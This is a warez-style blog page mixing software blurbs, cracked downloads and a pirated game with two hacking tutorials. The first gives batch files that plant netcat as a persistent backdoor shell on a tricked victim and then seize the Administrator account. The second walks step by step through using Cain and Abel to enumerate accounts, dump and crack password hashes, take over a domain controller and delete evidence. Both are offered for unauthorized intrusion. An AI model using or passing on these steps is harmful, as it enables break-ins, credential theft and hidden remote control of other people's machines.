• Disk based text editing and large file handling - supports files in excess of 4GB, minimum RAM used even for multi-megabyte files
• Mulitline find and replace dialogs for all searches (Find, Replace, Find in Files, Replace in Files)

• 100,000 word spell checker, with foreign languages support (American English, British English, Dutch, Finnish, French, German, Hungarian, Italian, Spanish and Swedish)
• Syntax highlighting - configurable, pre-configured for C/C++, VB, HTML, Java, and Perl, with special options for FORTRAN and LaTex. Multiple wordfiles available for download
• FTP client built in to give access to FTP servers with multiple account settings and automatic logon and save. (32-Bit Only) Includes support for SFTP (SSH2)
• SSH/Telnet window
• Project / workspace support
• Environment Selector - Provides predefined or user-created editing "environments" that remember the state of all of UltraEdit's dockable windows, toolbars and more for user convenience.
• Integrated scripting language to automate tasks
• Configurable keyboard mapping
• Column / block mode editing
• Hexadecimal editor allows editing of any binary file, shows binary and ASCII view
• Named templates
• HTML toolbar preconfigured for popular HTML function

Issues Fixed in (updated on 2009-10-28)
* Improved display of font in Lines Containing Find String dialog
* Removed ClearType rendering from menus if ClearType is not enabled in Windows display settings
* Projects now correctly remember files in split panes
* Sorting file tabs now correctly sorts numeric file names
* Restored behavior of application taking focus when opening files from a different source (e.g. Windows explorer or a different application)
* Fixed issue where function list doesn't update when loading file from explorer
* Fixed issue where some operations in very large files cause "Out of Memory" errors
* Fixed Delete Bookmarked Lines command
* Fixed issue where compare of FTP file to local file sometimes fails
* Other minor issues....


Read More..

Kaspersky Internet Security 2010

Kaspersky Internet Security 2010 automatically protects you and your family at all times – whether you work, bank, shop or play online.

Kaspersky Internet Security 2010 has everything you need for a safe and secure Internet experience.

All the features and technologies of Kaspersky Anti-Virus 2010 are included in this product.

Kaspersky Internet Security stops your PC being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers:

* Keeps your money and identity safe Improved!
* Protects against bank account fraud
* Safeguards against online shopping threats
* Allows questionable applications and websites
to be run in 'Safe Run Mode' New!
* Cybercriminals won’t hi-jack your PC
* Family protection from on-line predators
* Your files won’t be ruined by hackers Improved!
* Keeps your PC running smoothly
* Safer Wi-Fi connections
* Two way personal firewall

Download Read More..

Mystery Stories - FASiSO

The biggest adventure of all time is about to begin... Mystery Stories features 2 action-packed hidden object adventures! Start your journey in the Caribbean and travel half way around the world to Berlin on a quest to seek out clues and solve puzzles to unravel the mystery!

Island of Hope:
There is a kidnapping! The renowned professor of Mayan artefacts goes missing along with a precious Maya casket from the local museum! Only you, top New York journalist, can piece together the clues and solve the kidnap mystery. Are the Mayan spirits causing mischief as the natives believe or is there something more sinister behind it?

Berlin Nights:
Whilst in this historical city, a mysterious WWII machine hidden in the depths of abandoned war bunkers and tunnels is uncovered. Find clues hidden amongst historical sights and defend your findings from mysterious sects and ruthless ex-secret agents who want hold of the machine. Nothing will get in their way... including you!

- 94 exciting levels
- Challenging bonus mini-games
- Unique search modes

1. UnRAR
2. Burn the ISO with your favorite software.
3. Install game

Release: Mystery.Stories-FASiSO
Size: 444 MB
Genre: Mystery


Password Read More..

MAGiX Movie Editor Pro 12

There’s no doubt that Movie Edit Pro 12 Plus is packed full of useful video-editing tools. However, those features are often presented to the user in a somewhat untidy manner.

The first worrying sign was discovering that the 128-page manual was accompanied by a separate 128-page supplement to the main manual.

The supplement says that it acts as an introduction to ‘fades, effects, and edits’, which are the sort of basic editing tools that ought to be covered in the main manual rather than a supplement.

As a result, we found ourselves constantly flicking back and forth between the two manuals as we introduced ourselves to the program.

The installation process is rather long-winded too; this is due to the fact that Movie Edit is accompanied by a number of additional bundled programs, including a simple 3D animation program, photo editor and a program for compiling music playlists that you can use as soundtracks for your video projects.

When you eventually enter the main editing program, you’ll see that it offers three main working modes, which are activated by buttons running across the top of the screen.

The Record mode allows you to import audio and video clips, and quickly arrange them into a simple storyboard sequence in the program’s Timeline window.

You can do some simple editing here, adding text to individual clips, or adjusting colour controls to improve image quality.
However, importing clips can be a slow process as the program annoyingly keeps asking if you want to merge each new clip with the previous clip or keep it as a separate clip.

Click on the Edit button and the program switches into its main editing mode, which offers a very wide range of transitions, special effects, and other tools.
In this mode, the Timeline window also changes to provide more detailed control over the editing process.
It allows you to work with up to 99 separate tracks, which makes it possible to perform very complex editing work.

The program’s interface can start to look a bit crowded and confusing at this point, but there’s also a ‘1-Click’ button at the top of the screen that provides help for less experienced users.

Pressing this button activates a window called the Movieshow Maker, which can gather the video clips you place in the Timeline and turn them into a complete project by automatically adding music and some simple effects and transitions.

The program also includes some useful templates that can help you with more complex tasks, such as creating picture-in-picture effects.

Finally, there’s the Burn mode, which allows you to create DVD menus so that you can burn your movie projects onto a DVD. Other export options include the ability to upload files straight onto Youtube, and MPEG4 support for exporting files onto handheld devices such as an iPod or Playstation Portable.

Unfortunately, for some reason you have to go through an annoyingly convoluted online-or-telephone activation process to use either the MPEG4 or MPEG2 features (MPEG2 is needed for burning DVDs).

Movie Edit Pro 12 Plus provides plenty of editing power – enough to compete with rivals such as Adobe’s Premiere Elements, or Pinnacle Studio and it’s cheaper than both.
However, it lacks the streamlined interface and ease of use that they offer, so Magix needs to work on its presentation and usability to match the sheer slickness of its video-editing rivals.


Read More..

Studio 5 LogoMaker 3.0

LogoMaker is an innovative and easy to use product that makes it possible for any business owner to design professional business logos, create advertisements, design nice page headers for a web site and other identifying graphics in just minutes. The easy to use features of LogoMaker include hundreds of fully modifiable logo templates and objects categorized by industry and interest, high quality graphical engine, creative tools and special effects.

* Over 1,500 professionally designed and fully modifiable logo templates categorized by industry and interest.
* Over 6,000 objects and shapes for making logos.
* Easy to use, drag & drop, graphical engine for image and text manipulation: scale, rotate, align, groups, layers etc.
* Vector-based Shape editor to create and customize your own shapes.
* Over 50 effects for object and text editing such as Shadow, Transparency, Brightness, Blur, Gradient, etc.
* Plug-ins for adding special effects such as Jitter, Pixelate, Sharp, Water etc.
* Regular, Polygonal, Concave, Wavy, Circular, Outline and Perspective Text
* 3D options for creating 3D text and shapes
* One-click effects: Mirror, Plastics, Depth, Glow, Metallic, Bump, etc.
* Full screen editing
* Export to PDF, JPG, TIF and other file formats
* Professional, Creative, Refined & Designer fonts included
* The built in Internet browser for accessing new objects, templates, 40,000 free fonts, 100,000 free pictures, etc.


Read More..

Hacking a Network Computer

As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:

@echo off

xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad.

The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:

@echo off

netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this.

Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32
folder and then type in:

shutdown -r -t 10 -c "Hello"

The computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!
Read More..

LimeWire PRO 5.3.6 Final

LimeWire PRO 5.3.6 Final - Full Registered Version-hardal | 21.4 MB.

LimeWire - The Fastest P2P File Sharing Program on the Planet, running on the Gnutella Network. It is open standard software running on an open protocol, free for the public to use. LimeWire allows you to share any file such as.mp3s, .avis, jpgs, tiffs, etc., allows you to search for multiple files at the same time, available in several different languages, and is most famous for its ease-of-use and cross-platform compatibility. Limewire is written in Java, and will run on Windows, Macintosh, Linux, Solaris, and other computing platforms.

1. NO BUNDLED SOFTWARE OF ANY KIND! No spyware. No adware. Guaranteed.
2. Firewall to Firewall Transfers. Since about 60% of users are currently firewalled, this feature greatly increases the amount of content on the network.
3. Faster network connections. Using new "UDP Host Caches", LimeWire starts up and connects faster then ever before!
4. Universal Plug 'N Play. UPnP support allows LimeWire to find more search results and have faster downloads.
5. iTunes Integration. Windows users can now take advantage of LimeWire's iTunes integration.
6. Creative Commons Integration. LimeWire now recognizes OGGs and MP3s licensed under a Creative Commons License.
7. "What's New?" feature. Users can browse the network for the most recent content additions.

8. Search drill down results. Searches in LimeWire now immediately display the artists, albums and other information that fully describes files.
9. Proxy support. Users can now use web proxies to route their to protect their identity.
10. Support for International searches and International groups. Users can now search in any language, and LimeWire ensures that a user will be connected to other users with their own language to aide international users to receive search results in their native language and to find content from sources that are close to home.

LimeWire still has the following great features:
- Ease of use - just install, run, and search
- Ability to search by artist, title, genre, or other metainformation
- Elegant multiple search tabbed interface
- "Swarm" downloads from multiple hosts help you get files faster
- iTunes integration for Mac and Windows users
- Unique "ultrapeer" technology reduces bandwidth requirements for most users
- Integrated chat
- Directly connect to a computer
- Browse host feature--even works through firewalls
- Added Bitzi metadata lookup
- International versions: Now available in many new languages
- Connects to the network using GWebCache, a distributed connection system
- Automatic local network searches for lightning-fast downloads
- Support for MAGNET links that allow you to click on web page links that access Gnutella

What's New:
• Updated interface for smoother navigation
• Faster BitTorrent downloads
• Improved performance

Read More..

Cain and Abel

The following appendices work to support these endeavors with the Cain and Abel application. Current versions of this application can be located at the author’s site at

What you will need:

1. current version of Cain from

2. Windows 2000 or Windows XPSP1 configured workstation

Getting started:

Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take it down. Proceed with caution.
you will need to know what you are trying to hack. This appendix assumes that you are trying to get the administrator’s username and password for the network. The focus of this appendix is on obtaining that information. The other appendices in this chapter deal with other capabilities of the application to gain access to a network. To this end we need to accomplish the following steps to get the admin account:

Hacking Security Forum

1. Enumerate the computers on the network

2. connect to a computer and install the Abel remote app

3. Harvest user account information

4. Crack user account information passwords to get the admin account

5. Login to the target machine with the admin account

6. Install the Abel service on the target server

7. Harvest all of the hashes from a server and sent to the cracker

Once we have the admin account on the server, the rest is up to you.

First things first, after you launch the application you will need configure the Sniffer to use the appropriate network card. If you have multiple network cards, it might be useful to know what your MAC address is for your primary connection or the one that you will be using for Cain network access. You can determine your MAC address by performing the following steps:

1. Go to “Start”

2. Run

3. enter the “CMD”

4. A black window will appear

5. Enter the following information into the window without the quotes

“Ipconfig /all” and then Enter

6. Determine which one of the Ethernet adapters you are using and copy the MAC address to notepad. You use this to help determine which NIC to select in the Cain application

With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list select the device with the MAC Address of Ethernet or Wireless network card that you will be using for hacking. While we are here, let’s review some of the other tabs and information in the Configuration Dialog Box. Here is a brief description of each tab and its configuration:

1. Sniffer Tab: allows the user to specify the Ethernet interface and the start up options for the sniffer and ARP features of the application.

2. ARP Tab: Allows the user to in effect to lie to the network and tell all of the other hosts that your IP is actually that of a more important host on the network like a server or router. This feature is useful in that you can impersonate the other device and have all traffic for that device “routed” to you workstation. Keep in mind that servers and routers and designed for multiple high capacity connections. If the device that you are operating from can not keep up with traffic generated by this configuration, the target network will slow down and even come to a halt. This will surly lead to your detection and eventual demise as a hacker as the event is easily detected and tracked with the right equipment.

3. Filters and Ports: Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right click on one of the services you will be able to change both the TCP and UDP ports. But this will not be necessary for this tutorial, but will be useful future tutorials.

4. HTTP Fields: Several features of the application such as the LSA Secrets dumper, HTTP Sniffer and ARP-HTTPS will parse the sniffed or stored information from web pages viewed. Simply put, the more fields that you add to the HTTP and passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.

5. Traceroute: It is what it is, trace route or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, Net mask resolution, and Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.

Ok, So now you have everything all set and you are ready to rumble, as it were. Now, after I select the adapter on the sniffer tab, I generally set the sniffer to start on start up and then select apply. Do not enable the arp poisioning at this point, you will not need it and if this is your first exposure to Cain and or hacking, you will just get yourself caught with the ARP stuff. I generally stop and start the application at this point to get a clean start and reload the application with my intended settings.

So, launch the app and make sure that the first icon on the Left that looks like a miniature Ethernet card appears depressed. This indicates that the sniffer is activated. At this point, it is time to get a cup of coffee and let the app just sit. Yep, that is right, just leave it running and don’t touch anything. The reason for this is that not every device is talking all of the time and some protocols only talk on specific intervals. You will need to wait at least 300 seconds to ensure that the Cain sniffer has heard from each protocol at least once. This is most germane to routing protocols, but I have seen it take this long or longer to see all of the hosts on a LAN.

NOTE: The next section makes the assumption that you have properly configured your Ethernet interface with an IP address that is correct for your network and that you have logical connectivity to the target hosts.

At this point you are asking your self “Are we ever going to start hacking…?”

Let’s hack then. Go to the network tab and double click on the Microsoft windows network under the Entire Network navigation tree. After a few moments, the tree will expand and show each of the workgroups and domains that are accessible to your network card. From here select your target network and click the “+” symbol to the Left to open the tree.

Understanding that servers generally, or are supposed to, have more security than the other devices on the network, it is generally better to go for a workstation over a server out of the gate. Also, some servers will have monitoring agents on then that could detect what is going to happen next.

Double click on the All Computers object in the tree under the target network section of the tree. Now look at the names of the all of the devices listed. Many times the administrator will name the servers with some naming convention that will single them out in not time flat. Try to use the naming convention to your advantage and look for a pc that potentially is used by multiple persons. Key giveaways are names like scanner1, or receptionist, or lab. These machines will have several accounts on them and one of them is likely to have an admin account on it. These machines are key targets for two reasons. One, they are generally set up in a hurry when the company first sets up the network during a time when security is an afterthought, and as such they are likely to have default configurations for the local admin. Secondly, they generally have several apps on then and lots of people use them. With multiple applications, excessive rights are often granted to all users to ensure that every one can use the app that they need. Anyway, back to the hack….

When you click on your target, you will see 4 new objects in the tree under your target. These will be Groups, Services, Shares, and users. “Users” is what you want first. Double click on the users object icon and select yes to start the user enumeration. Caution! – Do not go for the history information at this time, we will get to that later. After all of the user accounts are enumerated they will be listed in alphabetical order and the local administrator will have a large red A in front of it. Ok, here we go. Go back to the computer object of the computer that you just enumerated and right click on the object. Select the connect as option. Just for fun, if the administrator account has not been renamed, it is likely that it will have a blank password or be something fairly simple. Try to log in with the user account administrator and a blank password. In about 70% of my experience at this point, the hack is over for the local machine and you are in and can start playing. If it did work, then right click on the “Services” object for the device that you have just logged into and select Install Abel. Cain will install Abel.exe and Abel.dll into the %systemroot% on the local machine. Collapse the computer object and then re-expand it by double clicking on the computer object icon and you should see a Black square with a Blue A in the middle directly under the computer object in the tree. (I get excited just thinking about it). At this point you have the keys to the castle, you just need to see which key goes where. First lets get the hashes and get the ready to crack. Double click on the users object in the tree. Say no to the history pop up for now. Select all of your users by right clicking on an account and selecting “Send all to cracker.” Leave them for now, we will come back to them. What you have just done is load a portion of the application with all of the NT and NTLM hashes for every account on the target PC.

Now, if you have been following the book, you will remember the endless posts on hackerthreads that talked about using the command line to get at certain directories on a target machine, well here is where they will come into play. (If you are not too familiar with the cmd line, please refer to the Glossary of this book and review the command line hacking section. There are many useful tools like adding users and computers to domain security groups.

Let’s go over our options:

Console: This is the command prompt on the remote machine. Anything that you can do on your pc from the CMD prompt can be done from here. Examples include mapping a drive back to your pc and copying all the files from the target or its mapped drives to your machine for later data mining, adding local users to the local security groups or anything really. With windows, everything is possible from the command prompt.

Hashes: Allows for the enumeration of user accounts and their associated hashes with further ability to send all harvested information to the cracker.

LSA Secrets: Windows NT and Windows 2000 support cached logon accounts. The operating system default is to cache (store locally), the last 10 passwords. There are registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names and passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computers secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE \SECURITY\Policy\Secrets

Routes: From this object, you can determine all of the networks that this device is aware of. This can be powerful if the device is multihommed on two different networks, but you read about all of that in chapter 5 – Heard, but Not Seen, Right?

TCP Table: A simple listing of all of the processes and ports that are running and their TCP session status.

UDP Table: A simple listing of all of the processes and ports that are running and their UDP session status.

Ok, back to the hack, for those of you that did not get in with the admin account with no password, another trick is to try to login to each account in the list with the same password as the username. For example, right click on the computer object in the tree and try to login with on of the user account names and use the username as the password. If that does not work then try each one with no password. I have only run into one network where these two things did not work. Also, the LSA Secrets tree object will dump the following user accounts in plain text for you if they are present:

$Machine Account


L$******************** (this is the currently logged on user with the password)

L$******************** (this will be every user that has logged in up to the total number of cached logons.

RASDAILPARAMERTERS (these are present if RAS is configured and has been used)

Backup user accounts

Misc other accounts

Note: when you see the account in plain text, it will have separators. When you type the password into a logon, omit the extra “.”. ie. The password Ramius!@# will show up as R.a.m.i.u.s.!.@.#.... All that you will type the Ramius!@#.

OK, so far we have accomplished the following goals:

1. Enumerate the computers on the network

2. connect to a computer and install the Abel remote app

3. Harvest user account information

We still need to finish the hack by performing the following steps and then move the hack to a server or more valuable target.

1. Crack user account information passwords to get the admin account

2. Login to the target machine with the admin account

3. Install the Abel service on the target server

4. Harvest all of the hashes from a server and send to the cracker

5. Crack all of the accounts

Well, we learned in chapter 2 that staying focused is the key to hacking, so lets get back to it. In the Cain application, lets to the “Cracker Tab” and have a look.

The cracker tab has two basic parts. On the left are all of the hash types that Cain will crack for you. On the right are all of the associated hashes with their usernames. What we need to do is determine the password from the hash.

Note: Now would be a good time to copy the rainbow tables and password lists from the CD’s found in the back of the book to a directory on your local machine. The use of the rainbow tables will greatly increase the speed and efficiency of the cracking process as will the dictionary files included on the CDs.

Cain provides three options for determining the password from a harvested hash; these are Dictionary guessing, Bruting and Cryptanalysis. The preferred method is Cryptanalysis as it is by far the fastest if you have the tables generated. As stated in chapter 1, it would be a good idea to have tables generated for all of the possible variants for passwords from 1-7 with all possible combinations of letters and numbers and symbols. Dictionary cracking is by far the easiest of all configurations and every hacker should have extensive lists available to use.

In this appendix we are going to explore all three options.

First, let’s look at what we can tell so far from the hashes and the Cain application. One of the columns heading looks like this <8. This means that any password with an “*” symbol is less than 8 characters. These will be the easiest to brute as they can be bruted in about 5.5 hrs with a marginal processor and memory. You can sort all of the hashes by size by clicking on the header bar at the top of the column. On the PC that I am hacking for this tutorial, I have 13 hashes and 7 of them appear to be less than 8 characters so we will start with cracking first.

Dictionary Cracking – Select all of the hashes and select Dictionary Attack (LM). You could select the NTLM but the process is slower and with few exceptions the NTLM and NT passwords are the same and NT cracks (Guesses) faster. In the Dictionary window, you will need to populate the File window with each of you dictionary files. (Move files from the CDs to your hard drive or it will take significantly longer than necessary. Check the following boxes: As is Password, Reverse, Lowercase, uppercase, and two numbers.

Dictionary Cracking

Click start and watch Cain work. The more lists and words that you have, the longer it will take. When Cain is finished, click exit and then look at the NT password column. All of the passwords cracked will show up next to the now owned accounts. Voila!

Take a second to look carefully at the accounts and passwords in the list. Look for patterns like the use of letters and characters in sequence. Many administrators use reoccurring patterns to help users remember their passwords. One time I found a network where the passwords were the first three letters of the first name and the three letter month abbreviation of the month that the password was set. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to create all possible combinations and shorten the window.

Cryptanalysis attacking

Alright then… Resort your hashes so single out the accounts that you have left to crack. Now select all of the un-cracked or guessed accounts and right click on the accounts again and select Cryptanalysis (LM). Add the tables that you copied from the CD to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go pretty quick. Voila! Take a second to review your progress and look for additional patterns.

At this point, I would grab a program like sam grab that has the ability to determine which accounts are members of the domain administrators group to see if you have gotten any admin level accounts. Once you move to the next step, which is bruting, most of what you have left are long passwords that are going to be difficult and time consuming. Any time saver applications that you can find will be helpful.


Repeat the same process for selecting the accounts. Here is the first time that you will actually have to use your brain in this appendix. Bruting can be extremely time consuming. Look closely at all of the passwords that you have cracked and look for patterns. First do you see any special characters in any of the passwords cracked. How about numbers? A lot of all upper case of all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The goal is to use the least amount of characters and symbols to get the account that you need. So lets finish it off. Select all of the un cracked accounts and follow the previous steps and select Brute Force (LM). The default for LM is A-Z and 0-9. This is because that is due nature of LM hashes and the way that they are stored. Another note is that sometimes you will see a “?” or several “????” and then some numbers or letters. This is also due to the nature of NT versus NTLM and the method that NT used to store passwords. If you read chapter 2, you already know why this is. If not see if you can find a repeating structure that is based on the number 7. Anyway, based on the other passwords and those accounts with an “*” in the <8 field on how many characters to specify in the password length pull down box. Make your selection and have at it. Holy crap Batman … 123749997 years to completion. If you see this, then you should rethink the need for this account. However, working with the application, rainbow tables and password generators can help your narrow down to reasonable time frames to get the job done.

Ok, so now we have our admin account and are ready to finish the hack. Go back to the network tab in the Cain application and select the Domain Controllers object under the same domain where the PC was that you harvested the hashes. Double Click. Now look through the serves in the domain and select your target. If you find one with PDC or BDC in the list, pick that one. Right click on the server and select connect as and enter the “Hacked Credentials.” Now go to the “services” object and right click again and install the service. Voila! You have admin and likely every other type of access to the target host!

Now you can repeat the steps to finish the hack

And this concludes our hack as we have accomplished each of out goals.

Some things to consider:

When you exit the Cain application, all of the password hashes and cracked accounts will be saved and can be hacked later in a remote location. They can also be used against you in court as evidence.

Also you can export all of the hashes to an .lc or text file and open up the file in Excel to perform some additional sorting and the like.

All of the devices that you infected with the Abel.exe and Abel.dll will have the Abel.exe service running and because the list is alphabetical, it will always be on top of the list. Any admin, even poor ones will question the presence of a new service. And there are ways to trace the install time and originating IP and MAC address of the installing machine back to YOU. Read Chapter 5 – Heard but not seen! Covering your tracks… It is everything. Here is a hint. Enable the telnet service and connect to the hacked and from the command prompt you will use the following commands

Net stop abel.exe

Cd %windir%

Del abel.*

CD %windir%/system32

Del abel.*


Once this is complete, you will have to reinstall the Abel client app to reconnect through Cain. Oh, and there is that bit about the event and security logs…. But that is another tutorial……

( I will update this portion later, it is getting late, but check back cause there will be a ton of references and additional links)


MAC: Media Access Control - In computer networking a media access control address (MAC address) is a code on most forms of networking equipment that allows for that device to be uniquely identified. Each manufacturer for Network Cards has been assigned a predefined range or block of numbers. The structure and other uses of the MAC addressing are defined in the Intro to networking appendix at the end of this book. Information about manufacturer assignments for MAC addressing block assignments can also be found at the following site.

Sniffing: Sniffing is the act or process of “Listening” to some or all of the information that is being transmitted on the same network segment that a device is on. On an OSI Model Layer 1 network, even the most basic Sniffers are capable of “hearing” all of the traffic that is sent across a LAN. Moving to a Layer 2 network complicates the process somewhat, however tools like Cain allow for the spanning of all ports to allow the exploitation of layer 2 switched networks.

ARP: Address Resolution Protocol – Address Resolution Protocol; a TCP/IP function for associating an IP address with a link-level address. Understanding ARP and its functions and capabilities are key skills for hackers and security professionals alike. A basic understanding of ARP is necessary to properly utilize all of the functions that Cain is capable of.
Read More..